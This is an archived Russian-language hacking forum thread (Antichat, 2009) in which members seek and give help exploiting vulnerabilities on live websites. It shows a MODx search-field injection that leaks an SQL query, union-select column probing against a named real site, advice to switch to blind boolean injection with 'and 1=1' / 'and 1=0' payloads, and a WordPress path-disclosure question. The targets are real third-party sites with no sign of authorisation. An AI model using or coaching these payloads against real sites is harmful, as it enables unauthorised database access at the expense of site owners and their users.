HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.11.2009, 16:19
[QwyZ]
Banned
Регистрация: 07.07.2009
Сообщений: 109
Провел на форуме:
766927

Репутация: 67
По умолчанию

короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;



вводил в поле поиска - ">'>sc"><
 
Ответить с цитированием

  #2  
Старый 01.11.2009, 16:21
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от [QwyZ]  
короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;



вводил в поле поиска - ">'>sc"><
скуль, не? причем с кривым экранированием
 
Ответить с цитированием

  #3  
Старый 01.11.2009, 16:29
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от [QwyZ]  
короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;



вводил в поле поиска - ">'>sc"><
Тебе вот сюда .
 
Ответить с цитированием

  #4  
Старый 01.11.2009, 16:22
[QwyZ]
Banned
Регистрация: 07.07.2009
Сообщений: 109
Провел на форуме:
766927

Репутация: 67
По умолчанию

Цитата:
скуль, не? причем с кривым экранированием
ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю

Последний раз редактировалось [QwyZ]; 01.11.2009 в 16:27..
 
Ответить с цитированием

  #5  
Старый 01.11.2009, 16:27
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от [QwyZ]  
ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю
читай маны
например тут:
Цитата:
http://forum.antichat.ru/thread19844.html
или тут:
Цитата:
http://forum.antichat.ru/thread43966.html

Последний раз редактировалось gisTy; 01.11.2009 в 16:32..
 
Ответить с цитированием

Wordpress 2.5
  #6  
Старый 01.11.2009, 16:28
acdel
Участник форума
Регистрация: 07.01.2008
Сообщений: 187
Провел на форуме:
2809557

Репутация: 126
По умолчанию Wordpress 2.5

При обращении к файлу

http://localhost/blog/wp-includes/class-feed.php

имеем

Цитата:
Warning: require_once(ABSPATHWPINC/class-simplepie.php) [function.require-once]: failed to open stream: No such file or directory in T:\home\localhost\blog\wp-includes\class-feed.php on line 4

Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHWPINC/class-simplepie.php' (include_path='.;/usr/local/PHP/PEAR;/usr/local/PHP/Smarty') in T:\home\localhost\blog\wp-includes\class-feed.php on line 4
Можно это как-то раскрутить, без параметра?
 
Ответить с цитированием

  #7  
Старый 01.11.2009, 16:30
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от acdel  
Можно это как-то раскрутить, без параметра?
я думаю, что нет
 
Ответить с цитированием

  #8  
Старый 01.11.2009, 17:32
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Прошу помощи. Нашёл следующую скулю:
Код:
http://www.bmx.ru/files.php?id=1'
Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
Код:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--
Цитата:
Не могу выполнить запрос! SELECT * FROM bmx_files WHERE razd_id = 1 union select 1,1,1,1-- ORDER BY id DESC
Пробую подобрать дальше, выскакивает другая ошибка:
Цитата:
Не могу выполнить запрос! SELECT * FROM bmx_razds_f WHERE id = 1 union select 1,1,1,1,1--
Это не операбельно, или у меня совсем мозг не работает уже?
 
Ответить с цитированием

  #9  
Старый 01.11.2009, 17:50
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

Цитата:
Сообщение от keng  
Прошу помощи. Нашёл следующую скулю:
Код:
http://www.bmx.ru/files.php?id=1'
Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
Код:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--


Пробую подобрать дальше, выскакивает другая ошибка:


Это не операбельно, или у меня совсем мозг не работает уже?
думаю ее просто нужно крутить как слепую

Код:
http://www.bmx.ru/files.php?id=1+and+1=1+--+
Код:
http://www.bmx.ru/files.php?id=1+and+1=0+--+
 
Ответить с цитированием

  #10  
Старый 01.11.2009, 18:04
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от nemaniak  
думаю ее просто нужно крутить как слепую

Код:
http://www.bmx.ru/files.php?id=1+and+1=1+--+
Код:
http://www.bmx.ru/files.php?id=1+and+1=0+--+
Я тоже об этом думал. Раз нет других вариантов - буду так. Большое спасибо!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.